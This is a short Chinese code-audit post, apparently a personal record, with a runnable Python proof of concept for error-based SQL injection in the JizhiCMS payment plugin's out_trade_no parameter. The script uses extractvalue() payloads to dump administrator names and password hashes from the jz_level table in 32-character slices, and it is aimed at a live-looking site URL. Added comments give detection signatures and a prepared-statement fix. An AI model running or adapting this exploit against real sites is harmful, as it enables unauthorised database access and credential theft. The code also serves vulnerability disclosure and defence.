本地代码审计 极致cms 支付插件 sql注入 Poc
本地代码审计 极致cms 支付插件 sql注入 Poc
报错注入有32位长度限制；PoC 写法：先获取数据总长度，再按32位逐段截取。做个记录。
报错注入POC
# Error-based SQL injection proof of concept for the 极致cms (JizhiCMS) payment plugin.
# Per this PoC, the `out_trade_no` query parameter of `/mypay/alipay_return_pay`
# reaches a SQL statement unescaped: a crafted value makes MySQL raise an error
# whose text carries query results (extractvalue()). That error text carries at
# most 32 characters, so the script first reads the total length of the data and
# then pulls it out in 32-character slices.
#
# Defender notes:
#   - Detection: web/WAF logs showing `extractvalue(` or `concat(0x7e` inside
#     `out_trade_no`, and bursts of requests to this path whose `substr(` offset
#     increases by 32 each time.
#   - Mitigation: the handler must bind `out_trade_no` as a prepared-statement
#     parameter (or reject values that are not a well-formed trade number) rather
#     than interpolating it into the query, and database error text must not be
#     echoed in responses, which removes the channel this script reads from.
#   - Every function below performs live HTTP requests against the module-level
#     `url_start`, which is assigned at the bottom of the file.
import requests
import re


def get_length():
    """Return the length of the concatenated `name~pass` data, as a string.

    Sends one injected request and scrapes the value between the `~` marker and
    the closing quote out of the database error text echoed in the response.
    Raises AttributeError if the response contains no such marker (re.search
    returns None), e.g. when the server does not echo database errors.
    """
    #url_start = 'http://www.jizhicms.com'
    payload = "/mypay/alipay_return_pay?out_trade_no=1' and extractvalue(1,concat(0x7e,(SELECT DISTINCT LENGTH((GROUP_CONCAT(NAME,0x7e,pass))) FROM jz_level )))--+"
    req = requests.get(url=url_start+payload)
    html = req.text
    #print(html)
    # `~` (0x7e) is the marker the payload prepends so the value can be located
    # in the error text; the value is returned as a string, not an int.
    length = re.search('~(.*?)\'',html).group(1)
    return length


def get_hash(start,end):
    """Return one slice of the concatenated `name~pass` data.

    `start` is the 1-based offset and `end` is the slice length: both are
    substituted straight into the SQL `substr()` call, so `end` is a length,
    not an end offset (main() always passes 32). Raises AttributeError if the
    response does not contain the `~` marker, as in get_length().
    """
    #url_start = 'http://www.jizhicms.com'
    payload = "/mypay/alipay_return_pay?out_trade_no=1' and extractvalue(1,concat(0x7e,(select substr((group_concat(name,0x7e,pass)),{0},{1}) from jz_level )))--+"
    payload = payload.format(start,end)
    req = requests.get(url=url_start+payload)
    html = req.text
    #print(html)
    hash = re.search('~(.*?)\'',html).group(1)
    return hash


def main():
    """Fetch the data slice by slice and return it as one string.

    Makes one request for the total length, then one request per 32-character
    slice (turn + 1 requests in total), concatenating the slices in order.
    """
    string = ''
    length = get_length()
    # / is true division, // is floor division, % is modulo
    turn = int(length)//32
    #print(turn)
    # Slice i starts at 1-based offset 1 + 32*i; the final iteration covers the
    # remainder (or an empty slice when the length is an exact multiple of 32).
    for i in range(0,turn+1):
        #print(i)
        hash = get_hash(1+(i*32),32)
        string += hash
    return string


# Base URL of the target instance; the functions above read this global.
url_start = 'http://www.jizhicms.com/'
print(main())
来自非洲的欧提大人